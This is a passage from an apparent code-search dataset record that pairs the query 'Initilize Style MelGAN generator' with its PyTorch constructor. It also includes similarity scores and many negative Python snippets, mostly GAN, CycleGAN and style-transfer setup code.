cv2.COLOR_YCrCb2BGR)\n else:\n raise Exception(\"Incorrect color space: {}\".format(srcColorSpace))\n\n if tgtColorSpace == 'BGR':\n img_tgt = img_bgr\n elif tgtColorSpace == 'RGB':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)\n elif tgtColorSpace == 'HSV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV)\n elif tgtColorSpace == 'HLS':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HLS)\n elif tgtColorSpace == 'LUV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2LUV)\n elif tgtColorSpace == 'YUV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2YUV)\n elif tgtColorSpace == 'YCrCb':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2YCrCb)\n else:\n raise Exception(\"Incorrect color space: {}\".format(tgtColorSpace))\n\n return img_tgt", "def convert_barcode_id_to_name(multiplex, fc_name, fq):\n fqout = list([None, None])\n if multiplex is None:\n fqout[0] = fq[0]\n if not fq[1] == None:\n fqout[1] = fq[1]\n else:\n bcid2name = dict([(mp['barcode_id'], mp['name']) for mp in multiplex])\n for bcid in bcid2name.keys():\n mstr = \"%s_%s_\" % (fc_name, bcid) \n if fq[0].find(mstr) != -1:\n from_str = \"%s_%s_\" %(fc_name, bcid)\n to_str = \"%s_%s_\" %(fc_name, bcid2name[bcid])\n fqout[0] = fq[0].replace(from_str, to_str)\n if not fq[1] == None:\n fqout[1] = fq[1].replace(from_str, to_str)\n fqout[0] = fqout[0].replace(\"_fastq.txt\", \".fastq\")\n if not fqout[1] == None:\n fqout[1] = fqout[1].replace(\"_fastq.txt\", \".fastq\")\n return os.path.basename(fqout[0]), (os.path.basename(fqout[1]) if len(fqout) > 1 else None)", "def fips(self, cname: str)->str:\n return self.__call__(cname)" ]
[ "0.58428967", "0.5695806", "0.56170404", "0.5537308", "0.54060704", "0.5312154", "0.52636075", "0.5209674", "0.5179819", "0.5158412", "0.5142017", "0.51086265", "0.50943804", "0.5006753", "0.5005477", "0.5003055", "0.49839967", "0.4969238", "0.49600613", "0.49500346", "0.48891428", "0.4872849", "0.48529443", "0.48464608", "0.48418045", "0.48335046", "0.48040202", "0.4775935", "0.47739902", "0.47731254", "0.47590137", "0.4756362", "0.4756362", "0.47552416", "0.47494853", "0.47325927", "0.47168714", "0.47113734", "0.46452442", "0.46417695", "0.46097383", "0.46029195", "0.46023118", "0.45945963", "0.45915323", "0.45858833", "0.45832995", "0.45831198", "0.45790198", "0.45789585", "0.45668328", "0.45571667", "0.4527899", "0.4525675", "0.45241448", "0.4518084", "0.4514835", "0.4512257", "0.45112363", "0.45110485", "0.45063925", "0.45056728", "0.45030665", "0.44982713", "0.44965133", "0.4487131", "0.44787735", "0.44755375", "0.44737518", "0.44665986", "0.44593948", "0.44589195", "0.4456767", "0.44548878", "0.44547075", "0.4451067", "0.44485563", "0.44485366", "0.44453758", "0.44427857", "0.44299322", "0.44141862", "0.4411273", "0.4409295", "0.440585", "0.44051456", "0.44037864", "0.44027153", "0.44026473", "0.4401877", "0.43891197", "0.43884054", "0.4387848", "0.4379409", "0.43780482", "0.43749568", "0.4369691", "0.43680164", "0.43675154", "0.4366187" ]
0.80150145
0
Initilize Style MelGAN generator.
def __init__( self, in_channels=128, aux_channels=80, channels=64, out_channels=1, kernel_size=9, dilation=2, bias=True, noise_upsample_scales=[11, 2, 2, 2], noise_upsample_activation="LeakyReLU", noise_upsample_activation_params={"negative_slope": 0.2}, upsample_scales=[2, 2, 2, 2, 2, 2, 2, 2, 1], upsample_mode="nearest", gated_function="softmax", use_weight_norm=True, ): super().__init__() self.in_channels = in_channels noise_upsample = [] in_chs = in_channels for noise_upsample_scale in noise_upsample_scales: # NOTE(kan-bayashi): How should we design noise upsampling part? noise_upsample += [ torch.nn.ConvTranspose1d( in_chs, channels, noise_upsample_scale * 2, stride=noise_upsample_scale, padding=noise_upsample_scale // 2 + noise_upsample_scale % 2, output_padding=noise_upsample_scale % 2, bias=bias, ) ] noise_upsample += [ getattr(torch.nn, noise_upsample_activation)( **noise_upsample_activation_params ) ] in_chs = channels self.noise_upsample = torch.nn.Sequential(*noise_upsample) self.noise_upsample_factor = np.prod(noise_upsample_scales) self.blocks = torch.nn.ModuleList() aux_chs = aux_channels for upsample_scale in upsample_scales: self.blocks += [ TADEResBlock( in_channels=channels, aux_channels=aux_chs, kernel_size=kernel_size, dilation=dilation, bias=bias, upsample_factor=upsample_scale, upsample_mode=upsample_mode, gated_function=gated_function, ), ] aux_chs = channels self.upsample_factor = np.prod(upsample_scales) self.output_conv = torch.nn.Sequential( torch.nn.Conv1d( channels, out_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2, ), torch.nn.Tanh(), ) # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def initialize(self):\n self.write_model(path=PATH.GRAD, suffix='new')\n\n if PAR.RANDOM_OVER_IT or optimize.iter == 1:\n self.get_random_frequencies()\n\n print('Generating synthetics')\n system.run('solver', 'eval_func',\n hosts='all',\n path=PATH.GRAD)\n\n self.write_misfit(path=PATH.GRAD, suffix='new')", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(self, model_name, logger=None, gpu_ids=None):\n super().__init__(model_name, 'generator', logger, gpu_ids)", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def setup(self):\n\n self.points = [[0.360502, 0.535494],\n [0.476489, 0.560185],\n [0.503125, 0.601218],\n [0.462382, 0.666667],\n [0.504702, 0.5]]\n self.max_neighbors = 4\n self.beta = 1\n self.graph = 'beta skeleton'\n self.edges = [0, 1, 0, 2, 0, 3, 0, 4,\n 1, 3, 1, 4,\n 2, 3, 2, 4,\n 3, 4]", "def init_batch(self):\n pass", "def init():", "def setGenerators(self):\n shape = (self.input_shape[0],self.input_shape[1])\n self.trainGen,self.validateGen = getBatchGenerators(self.batch_size,\n self.dataPath,\n shape,\n self.classMap,\n self.regression)", "def initialise_theano_rng(self):\n\n\t\tself.theano_rng = RandomStreams(self.rng.randint(2**30))", "def init_fn(init_savers, sess):\n ## Load Generator weights from MaskGAN checkpoint.\n if FLAGS.maskgan_ckpt:\n print('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n print('Asserting Generator is a seq2seq-variant.')\n tf.logging.info('Asserting Generator is a seq2seq-variant.')\n assert FLAGS.generator_model.startswith('seq2seq')\n init_saver = init_savers['init_saver']\n init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n ## Load the Discriminator weights from the MaskGAN checkpoint if\n # the weights are compatible.\n print('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n dis_init_saver = init_savers['dis_init_saver']\n dis_init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n else:\n return", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def load_generator(\n ckpt, is_stylegan1, G_res, out_size, noconst, latent_dim, n_mlp, channel_multiplier, dataparallel, base_res_factor\n):\n if is_stylegan1:\n generator = G_style(output_size=out_size, checkpoint=ckpt).cuda()\n else:\n generator = Generator(\n G_res,\n latent_dim,\n n_mlp,\n channel_multiplier=channel_multiplier,\n constant_input=not noconst,\n checkpoint=ckpt,\n output_size=out_size,\n base_res_factor=base_res_factor,\n ).cuda()\n if dataparallel:\n generator = th.nn.DataParallel(generator)\n return generator", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def initialize(self, parser):\n # basic parameters\n parser.add_argument('--name', type=str, default='cyclegan',\n help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='../ckpts7', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan_3d',\n help='chooses which model to use. [cycle_gan_3d | cycle_gan_2d_slice | test ]')\n parser.add_argument('--input_nc', type=int, default=1,\n help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=1,\n help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--f_map', type=list, default=[16, 32, 64, 128], help='# of gen filters in the last conv layer')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic',\n help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--typeG', type=str, default='unet',\n help='specify generator architecture [unet | resunet ]')\n parser.add_argument('--n_layers_D', type=int, default=4, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance',\n help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal',\n help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02,\n help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n # dataset parameters\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true',\n help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=16, help='input batch size')\n parser.add_argument('--crop_size', type=int, default=16, help='then crop to this size')\n parser.add_argument('--thickness', type=int, default=3, help='thickness when doing the cropping')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"),\n help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop',\n help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true',\n help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256,\n help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest',\n help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0',\n help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str,\n help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5,\n help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--dim', type=int, default=2, help='2|3')\n parser.add_argument('--dataset', type=str, default='adni',help='select a dataset')\n parser.add_argument('--lambda_cc', type=float, default=0.5,help='use correlation coefficient loss if larger than 0')\n parser.add_argument('--lambda_tv', type=float, default=0.5,help='use total variance regularization if larger than 0')\n parser.add_argument('--fid', action='store_true',help='calculate frechet inception distance')\n parser.add_argument('--srenorm', action='store_true',help='using spatial adaptive denormalization')\n parser.add_argument('--joint_seg', action='store_true',help='learning segmentation instead of input segmentation map, and using spatial adaptive denormalization')\n parser.add_argument('--prob_seg', action='store_true',help='segmentation map is a probability')\n parser.add_argument('--load_epoch', type=int, default=0, help='continue training: the epoch to continue from')\n parser.add_argument('--load_step', type=int, default=0, help='continue training: the step to continue from')\n parser.add_argument('--sem_dropout', action='store_true', help='semantic dropout or not')\n parser.add_argument('--seg_nc', type=int, default=4, help='number of semantic class')\n parser.add_argument('--fold', type=float, default=0, help='fold id for LOOCV')\n parser.add_argument('--mask', action='store_true',help='add mask for brain')\n\n self.initialized = True\n return parser", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n '2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self, gen):\n self.gen = gen", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def __init__(self):\n\n self.gm = GradientMapper()\n self.im = SpringMapper()\n self.fm = FullMapper(self.im, self.gm)\n # self.lm = LineMapper(self.fm)\n self.exit = False", "def __init__(self, latent_dim=helpers.LATENT_DIM_IMG, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [nn.Linear(in_feat, out_feat)]\n if normalize:\n layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.img_size = img_size\n self.channels = channels\n self.model = nn.Sequential(\n\n *block(latent_dim, 64, normalize=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, channels*img_size*img_size),\n nn.Tanh()\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def init():\n pass", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n 